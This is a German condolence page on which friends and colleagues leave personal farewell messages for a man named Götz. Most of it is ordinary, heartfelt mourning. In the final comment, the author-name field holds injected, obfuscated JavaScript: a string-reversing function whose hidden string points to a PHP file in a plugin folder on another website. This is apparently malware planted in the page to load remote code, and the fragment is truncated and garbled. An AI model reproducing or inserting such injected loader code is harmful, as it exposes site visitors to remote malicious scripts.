Ganz unten auf der Seite findest Du die Möglichkeit, Dich mit Deinen Gedanken an Götz ins Kondulenzbuch einzutragen.

Und hier geht es zum Abschiedsvideo von Götz.

26 Gedanken zu „Kondulenzseite

  1. Christine Antworten

    Danke Götz, für unsere Begegnung in diesem Leben, für dein Vertrauen, das du mir entgegen gebracht hast und dein gutes Herz.
    Mitakuye Oyasin
    Aho, Aho, Aho

  2. Dieter Blum Antworten

    Lieber Götz, du warst mir ein treuer Kamerad und Freund. Oftmals haben sich unsere Wege gekreuzt, wenn auch mit Unterbrechungen. Doch jede Begegnung mit dir ist in meinen Erinnerungen. Deine letzten Worte bleiben im ewigen Andenken an dich in meinem tiefen Inneren. Wir haben manche Zerrissenheit gemeinsam erlebt und auch durchlebt; doch am Ende blieben wir als Sieger. Gehe deinen Weg ohne Eile und Hast…du hast deine Aufträge erfüllt und darfst loslassen…

  3. Björn Antworten

    Manch guter Gedanke muss reifen, wie dein geliebter Roter.
    Du bist nicht mehr da und doch jeden Tag präsent. Du fehlst und füllst doch vieles aus.

    Einmal gesehen und sofort auf derselben Welle, ohne Worte den „Bro“ im anderen erkannt.

    Im Job und Privatem, es war egal, der Mensch war wichtig.

    Jetzt bist du voraus und ich sitze hier am Strand für UNSER GEMEINSAMES Bier. Das anvisierte Ziel für den notwendigen Weg.

    Miss you Bro and we will meet again at the right time and place. Watch out!

  4. Kay Gärtner Antworten

    Hallo Herr Wache!
    Viele Grüße aus dem sonnigen Dresden, aber das sehen Sie ja selbst am allerbesten.
    Alles Gute und viel Freude im nächsten Level.
    Wir sehen uns dort sicherlich irgendwann wieder.

    Beste Grüße
    Kay Gärtner

  5. Lisa Antworten

    Lieber Götz,

    Ich hoffe sehr, dass wir uns irgendwann dort treffen, wo Du nun bist.

    Bis dahin – genieße deine Reise ohne Schmerzen und ohne Ängste.

    Lisa

  6. Kai Pinske Antworten

    Lieber Götz, mit Freude denke ich an das Stück gemeinsamen Weges und die damit verbundenen Erlebnisse und vielen Gespräche zurück. Ich danke Dir dafür.

  7. Sven Antworten

    Lieber Götz,
    mehr per „Zufall“ habe ich diese Seite entdeckt…und dein „neues“ Abenteuer stimmt mich sehr traurig. Wir sind vor langer Zeit einen Teil unseres beruflichen Lebens gemeinsam gegangen, haben uns Samstags abwechselnd bei dir oder mir zu einer Weiterbildung getroffen und gemeinsam gelernt…unvergessen. Alles Gute auf deinem weiteren Weg und mein herzliches Beileid an deine Liebsten. Sven

  8. Jörg Heinicke Antworten

    Lieber Götz,
    es ist Pfingsten 2021. Nun ist es 9 Tage her, dass Du voraus gingst. Ich war heute morgen in meinem geliebten Erzgebirgswald laufen und habe an Dich gedacht. Voriges Jahr zogen wir gemeinsam Pfingstmontag bei herrlichem Wetter unsere Kreise durch den Kurpark von Bad Homburg. Wir sprachen über Gott und die Welt und deine Genesung und über deine Pläne an der Ostsee. Wir waren Spargel essen und krönten unser Mahl, wie sollte es auch anders sein, mit einem guten Espresso.
    Ich werde immer wieder an Dich denken, Dich nie vergessen. Du fehlst mir.
    Glückauf Dein Freund Jörg

  9. Olaf Binek Antworten

    Lieber Götz,

    Wir danken Dir für Deinen Impuls für uns. Du hast auf ewig einen Platz in unseren Herzen. Wir machen weiter! Für Dich, für uns, für unseren Sohn für unsere Gesundheit! Wir sind demutsvoll und dankbar und wünschen Dir eine spannende 3. Reise.

    In Liebe Antje, Paul und Olaf

  10. Alex Antworten

    Ein Licht ist verloschen, es ist dunkel und auch kälter geworden.
    Lieber Götz,
    über viele Jahre hinweg haben uns unsere beruflichen Interessen verbunden und Dein Bild des „roten Fadens“ ist unauslöschlich in meiner Erinnerung eingebrannt. Ich danke Dir herzlichst für unsere engagierten Diskussionen, unsere freundschaftlichen Streitgespräche zu gemeinsamen Themen, unseren zielführender Gedankenaustausch, aber auch für den gegenseitigen Respekt und die freundschaftliche Verbundenheit über viele Jahre hinweg. Du hast wichtige Zäsuren in meinem Leben gesetzt und Du hinterlässt eine Lücke, die nicht geschlossen werden kann. Irgendwann werden wir uns wieder begegnen …..

  11. Anke Antworten

    Lieber Götz, in Gedanken so oft eins, ohne Absprachen komplementär, inspirierend und bereichernd warst du in meinem Leben und wirst es in meinen Gedanken immer sein. Vielen Dank für dein Da-sein. Wir seh’n uns. Liebe Grüße Anke

  12. Alexandra

  • Georg vR Antworten

    Lieber Götz,
    ich denke sehr gerne an die schönen Runden mit Steaks, einer Lammkeule oder den leckeren Spaghetti Alio e Olio und dazu den guten Weinen von Joachim Höhn.
    Mal war es tiefsinnig – mal war es einfach nur schön – es war niemals banal.
    Ich danke Dir für schöne Stunden und gute Ideen, für Deine Herzenswärme und für Deinen Esprit.
    Auch ich empfinde es als große Ehre und große Freude ein Stück gemeinsame Wege mit Dir gegangen sein zu dürfen.
    Viele Gedanken aus deinen Reisen begleiten Bettina und mich weiterhin und helfen uns nach anderen Wegen als bisher Ausschau zu halten. Vielen Dank dafür.
    Deine große Seele darf uns auch weiterhin begleiten.
    Ich wünsche dieser Seele nun eine super gute Zeit und freue mich auf ein Wiedersehen – wann und wo auch immer das sein wird. Ich hoffe, wir erkennen uns dann wieder.
    Ich wünsche Dir von ganzem Herzen als erdenklich Liebe und Gute
    Georg

  • Wolfgang Antworten

    Götz, Bruder. Du bist schon mal vorgegangen. Dennoch bist Du immer auch bei uns. Es ist mir eine Ehre, dass sich unsere Wege begegneten. Wolfgang

  • Wolfgang Antworten

    Götz, Bruder. Du bist schon mal vorgegangen. Dennoch bist Du auch hier bei uns. Wir sehen uns wieder. Ich empfinde Glück und Dannkbarkeit, dass sich unsere Wege begegneten. Es ist mir eine Ehre. Wolfgang

  • Jan Antworten

    Lieber Götz,
    Danke das ich dich kennenlernen durfte.
    Ich wünsche dir für dein neues Abendteuer und neuen Wegen alles Liebe.
    Mögen Deine Pfade dir nur Gutes bescheren.
    Deine Reise geht weiter…
    AHO

  • Axel Antworten

    Götz,
    Kamerad, Trauzeuge und Freund über fast 40 Jahre. Es wäre nächstes Jahr soweit gewesen und dies wollten wir feiern. Es sollte nicht sein.
    Frei nach einem alten Motto,

    Still gesteht,
    Umgedreht,
    weg gegeht

    Du bist nun weg gegeht. Ich wünsche Dir auf diesem „weg gegeht“ in dein 3. Abenteuer das es so ist, wie du dir es gewünscht hast.

    „FLAK VORAN“

  • Elvira Antworten

    Was bleibt, ist ein dankbares, liebevolles Erinnern!
    Lieber Götz, es gibt ein Wiedersehen, du gingst nur schon mal vor.
    Deine Agape- Freundin.

  • Frank Martens Antworten

    Lieber Götz,
    Es war mir ebenfalls eine Ehre dich kennenlernen zu dürfen. Tecis, HDI…. wir hatten eine tolle Zeit. Aber das haben wir ja schon kürzlich mit Abschiedszigarre festgestellt, gell? In dem Sinne… verkauf denen da oben mal ne schöne Fondspolice 🙂

    Dein Frank

  • Gerhards Marie-Luise Antworten

    Bin sehr traurig, diesen Punkt der Endlichkeit akzeptieren zu müssen.
    Danke lieber Götz, für all den Mut diese besonderen Augenblicke der letzten Monate mit uns geteilt zu haben.
    So wie jeder der dich kannte seine eigenen Erinnerungen mit dir sich geschaffen hat, so wertvoll und einzigartig werden sie tief in unseren Herzen bleiben.
    Ich glaube, dass genau in diesem Augenblick wir alle eng miteinander und mit dir verbunden sind, mit ähnlichen Gedanken und Worten.
    Ein Mensch, der sich mit seiner starken Persönlichkeit und mit seinem charmanten Lächeln, klar und dennoch leise auf den Weg zu seinem dritten Abendteuer gemacht hat.
    Empfinde tiefe Dankbarkeit, ein kleines Stück des Weges mit dabei gewesen zu sein.
    Meine guten Gedanken begleiten alle, die um Götz trauern und ihm nahe waren.
    (Marie-Louise)

  • Lille Antworten

    GODISNOWHERE – wir haben vor einiger Zeit lange darüber gesprochen. Du bist jetzt irgendwo in Ewigkeit und immer bei uns.
    Danke für deine Freundschaft!
    Lille und Familie samt Otto

  • Daniel Antworten

    Lieber Götz,

    ich Danke Dir von Herzen für Deine immer offenen Ohren, Deine Lieben und klugen Worte, Deine Inspirationen und vor allem für Deine Menschlichkeit.

    Ich bin sehr dankbar, Dich kennen gelernt zu haben.

    Mach‘s gut und bis irgendwann…
    Daniel

  • Betty Antworten

    DU bist nicht mehr da,
    wo du warst,
    aber du bist
    ÜBERALL,
    wo wir sind!

    In Gedanken an dich.🤍

    Deine Betty

  • Mann an L$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:pt Autor des BeitragsAntworten

    Lieber Götz,

    es war mir ein Ehre.

    Ich drück´ Dich und bleibe für immer

    Dein Mann an Land

  • Schreibe einen Kommentar

    Deine E-Mail-Adresse wird nicht veröffentlicht.